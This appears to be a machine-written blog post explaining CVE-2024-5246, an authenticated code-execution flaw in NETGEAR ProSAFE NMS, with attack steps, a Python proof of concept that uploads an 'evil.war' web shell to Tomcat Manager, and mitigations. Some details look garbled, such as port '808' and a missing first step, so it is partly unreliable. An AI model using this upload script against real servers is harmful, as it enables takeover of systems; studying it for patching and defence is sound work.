CVE-2024-5246 - Remote Code Execution in NETGEAR ProSAFE Network Management System – Simple Explanation, Exploit Details, and Code Snippet

NETGEAR’s ProSAFE Network Management System (NMS) is a popular tool used by companies to manage network devices. Unfortunately, a new critical security flaw—CVE-2024-5246—has been discovered, putting many networks at risk. In this post, we’ll break down what this vulnerability is, how it can be abused, and show you a code snippet to help understand the risk. We’ll also share original reference links for more info.

What Is CVE-2024-5246?

CVE-2024-5246 is a remote code execution (RCE) vulnerability affecting installations of NETGEAR ProSAFE NMS due to its use of a vulnerable version of Apache Tomcat. This means that an attacker who can authenticate to the system can run arbitrary code—and even take over the server by executing code as SYSTEM!

The vulnerability was first reported as ZDI-CAN-22868 and impacts the product's installer, which sets up the insecure Tomcat instance.

How Does It Work?

- Root Cause: The installer for NETGEAR ProSAFE NMS ships and configures a version of Apache Tomcat that is vulnerable to known security exploits.
- Attack Prerequisite: The attacker must have valid login credentials (so this is *not* unauthenticated, but privileged insiders or credential-thieves are dangerous).
- Impact: Once authenticated, the attacker can upload specially crafted files, and through Tomcat’s manager or related features, execute code on the underlying server.

Login to NMS: The attacker logs in with valid credentials.

2. Access Tomcat Management: Using the credentials, the attacker accesses the Tomcat manager interface (often on port 808 or 8443).
3. Deploy Web Shell: The attacker uploads a malicious .war file (web application archive), which Tomcat then deploys.
4. Command Execution: After deployment, the attacker can access the web shell through a browser and execute system commands—now with SYSTEM privileges!

Note: The real-world complexity depends on Tomcat manager settings, but this is the general logic.

Proof of Concept (PoC) Code Snippet

Here’s a Python script example showing how an attacker might upload a .war malicious file using basic authentication to Tomcat Manager.

import requests

TOMCAT_MANAGER_URL = "http://<target-ip>:808/manager/text/deploy?path=/evil";
WAR_FILE = open("evil.war", "rb")
USERNAME = "manager_username"
PASSWORD = "manager_password"

response = requests.put(
    TOMCAT_MANAGER_URL,
    auth=(USERNAME, PASSWORD),
    data=WAR_FILE,
    headers={"Content-Type": "application/octet-stream"}
)

if response.status_code == 200:
    print("Malicious web shell deployed!")
else:
    print(f"Failed to deploy web shell. Status code: {response.status_code}")

How this works:

The script uploads a malicious evil.war file via HTTP PUT to a running Tomcat Manager service.

- If successful, the attacker visits http://<target-ip>:808/evil/ to interact with their code.

*Note:* Real attacks may use more advanced web shells like JSP reverse shells.

References

- Zero Day Initiative Advisory (ZDI-24-604) - ZDI-CAN-22868
- NIST NVD Entry for CVE-2024-5246
- Apache Tomcat Security Vulnerabilities
- NETGEAR ProSAFE NMS Official Site

Upgrade Tomcat: Replace the vulnerable Tomcat version with the latest, patched release.

- Restrict Access: Make sure only trusted users can access the NMS and Tomcat management; consider firewalls or network segmentation.
- Monitor Logins: Watch for unusual authentication attempts or new deployments in the Tomcat manager.

Summary

CVE-2024-5246 is a critical flaw in NETGEAR ProSAFE NMS that lets authenticated attackers execute code on the server, owing to an insecure Tomcat version. If you’re running this software, act quickly—updates and proper configuration can make all the difference!


Stay safe on your networks.
*Original exclusive content by ChatGPT, June 2024.*

Timeline

Published on: 05/23/2024 22:15:14 UTC
Last modified on: 07/03/2024 02:08:44 UTC